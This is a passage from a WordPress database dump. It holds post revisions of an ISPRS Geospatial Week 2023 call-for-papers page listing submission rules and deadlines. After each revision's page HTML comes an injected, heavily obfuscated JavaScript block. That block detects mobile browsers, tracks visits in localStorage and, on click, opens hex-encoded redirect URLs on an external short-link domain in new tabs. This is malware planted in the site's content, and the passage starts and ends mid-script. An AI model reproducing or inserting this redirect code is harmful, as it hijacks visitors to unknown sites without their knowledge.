_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:48:44','2022-11-25 22:48:44','',2659,'https://gsw2023.com/?p=3372',0,'revision','',0),
(3373,1,'2022-11-25 22:50:35','2022-11-25 22:50:35','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>[/vc_column_text][dt_portfolio_slider number=\"22\" order=\"asc\" content_aligment=\"center\"][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\"></li>\n</ul>\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:50:35','2022-11-25 22:50:35','',2659,'https://gsw2023.com/?p=3373',0,'revision','',0),
(3374,1,'2022-11-25 22:51:55','2022-11-25 22:51:55','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>[/vc_column_text][dt_portfolio_slider number=\"22\" order=\"asc\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\"></li>\n</ul>\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 